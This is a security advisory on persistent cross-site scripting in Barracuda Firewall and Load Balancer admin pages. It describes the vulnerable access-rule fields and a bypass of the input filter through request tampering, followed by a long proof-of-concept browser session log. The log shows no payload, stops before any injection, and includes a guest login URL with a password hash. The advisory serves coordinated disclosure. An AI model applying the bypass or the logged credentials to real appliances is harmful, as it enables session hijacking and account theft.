Document Title:
===============
Barracuda WAF & LB #37 - Persistent Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1103
Barracuda Networks Security ID (BNSEC): BNSEC-1263
https://www.barracuda.com/support/knowledgebase/501600000013gvr
Solution #00006523
BNSEC-01263: Authenticated persistent XSS in Barracuda Load Balancer v4.2.2
Release Date:
=============
2014-07-27
Vulnerability Laboratory ID (VL-ID):
====================================
1103
Common Vulnerability Scoring System:
====================================
3.9
Product & Service Introduction:
===============================
The Barracuda Firewall goes beyond traditional network firewalls and UTMs by providing powerful network security,
granular layer 7 application controls, user awareness and secure VPN connectivity combined with cloud-based malware
protection, content filtering and reporting. It alleviates the performance bottlenecks in Unified Threat Management
(UTM) appliances through intelligent integration of on-premise and cloud-based technologies. While the powerful on-
premises appliance is optimized for tasks like packet forwarding and routing, Intrusion Prevention (IPS), DNS/DHCP
services and site-to-site connectivity; CPU intensive tasks like virus scanning, content filtering and usage
reporting benefit from the scalable performance and elasticity of the cloud.
(Copy o the Vendor Homepage: https://www.barracuda.com/products/firewall )
The Barracuda Load Balancer ADC is ideal for organizations looking for a high-performance, yet cost-effective
application delivery and security solution. With the broadest range of hardware and virtual models, the Barracuda
Load Balancer ADC provides maximum flexibility for organizations looking to build highly secure and scalable
application infrastructure, whether it’s deployed on-premises or in the cloud.
(Copy o the Vendor Homepage: https://www.barracuda.com/products/loadbalancer )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent vulnerabilities in the Barracuda Networks Firewall v6.1.0.016 & Loadbalancer v4.2.2 Application.
Vulnerability Disclosure Timeline:
==================================
2013-09-30: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-10-01: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2013-11-29: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2014-07-14: Vendor Fix/Patch (Barracuda Networks Developer Team)
2014-07-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Firewall Appliance Web-Application 6.1.0.016 - x100 x200 x300 x400 x500 x600 & Vx
Barracuda Networks
Product: Load Balancer 4.2.2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Low
Technical Details & Description:
================================
Multiple persistent input validation web vulnerability has been discovered in the Barracuda Networks Firewall v6.1.0.016 & Loadbalancer v4.2.2 Appliance Application.
The vulnerability allows remote attackers to implement via inject own malicious persistent (application-side) script codes to the online-service module.
The vulnerabilities are located in the `Firewall > Firewall Rules > Custom Firewall Access Rules > Access Rules` module. Attackers are able to inject
via POST method request through the `ip address` or `redirect to` values own malicious script codes. The attack vector is persistent on the application-side
of the service and the request method to inject is POST. The local privileged barracuda user account can inject own malicious context by usage of the `ip`
and `redirect` to input fields. The execution of the script code after the inject occurs in the same `item listing` after processing to add.
The input fields have an input filter restriction which can be bypassed by direct manipulation of the POST method request via live session tamper. The vulnerable
module input form with the restriction notifies the user by a red highlighted status message. The attacker only needs to click twice the service plus button to
bypass the validation mechanism and can at the end add the own malicious context. The script code executes on the application-side of the barracuda network
firewall and loadbalancer appliance application.
The security risk of the bypass and persistent input validation vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.9.
Exploitation of the persistent web vulnerability requires low user interaction and a local privileged web-application account. Successful exploitation of the vulnerability
can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or persistent manipulation of module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Firewall > Firewall Rules > Custom Firewall Access Rules > Access Rules
Vulnerable Input Field(s):
[+] Source & Destination > IP Address
[+] Source & Destination > Redirect to
Vulnerable Parameter(s):
[+] value
Affected Module(s):
[+] Ip Listing
[+] Redirect Information Listing (buttom)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged application user account and
low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps
below to continue.
PoC: Firewall > Firewall Rules > Custom Firewall Access Rules > Access Rules (Source & Destination) - IP & Redirect to
--- PoC Session Logs Request/Response [GET|POST] ---
2:35:05.529[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.529[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.530[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/scriptaculous.js?load=effects,dragdrop&v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.530[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-prototype-adapter.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.531[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-all.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.532[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js_functions.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.533[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-ux.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.534[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/slider.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.535[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.helper.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.536[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.ajaxvalidation.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.537[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/utils.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.537[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/adapters/prototype-adapter.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.538[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/highcharts.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.556[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:05.613[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:05.654[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/effects.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.655[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/dragdrop.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.944[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/loading-spinner.gif Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.945[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/boxnet-spinner.gif Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.945[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/ha-spinner.gif Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.948[308ms][total 308ms] Status: 200[OK]
GET https://firewall.ptest.cudasvc.com/cgi-mod/header_logo.cgi?6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[-1] Mime Type[image/png]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[image/png]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Tue, 01 Oct 2013 00:35:06 GMT]
Date[Tue, 01 Oct 2013 00:35:06 GMT]
Cache-Control[no-cache, no-store]
2:35:06.103[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/loading_anim.gif Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:06.104[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/port_greenON_yellowON.png Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:06.105[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/port_greenOFF_yellowOFF.png Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:06.106[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/port_greenON_yellowOFF.png Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:06.146[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/green.png Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016]
2:35:06.146[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/meter_bg.gif Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/progress.css?v=6.1.0.016]
2:35:06.148[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/meter_g.gif Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/progress.css?v=6.1.0.016]
2:35:07.285[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?ajax_action=build_status_expiration_display_content&jsonp=update_subscription_module&locale=en_US Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:09.169[1999ms][total 4455ms] Status: 200[OK]
GET https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[64957] Mime Type[text/html]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Mon, 01 Oct 2012 00:35:11 GMT]
Date[Tue, 01 Oct 2013 00:35:11 GMT]
Content-Length[64957]
2:35:11.270[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/barracuda.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.271[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-all.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.272[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-ux.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.273[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.274[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.276[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/scriptaculous.js?load=effects,dragdrop&v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.277[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-prototype-adapter.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.278[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-all.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.280[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js_functions.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.281[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-ux.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.281[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.helper.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.282[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.ajaxvalidation.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
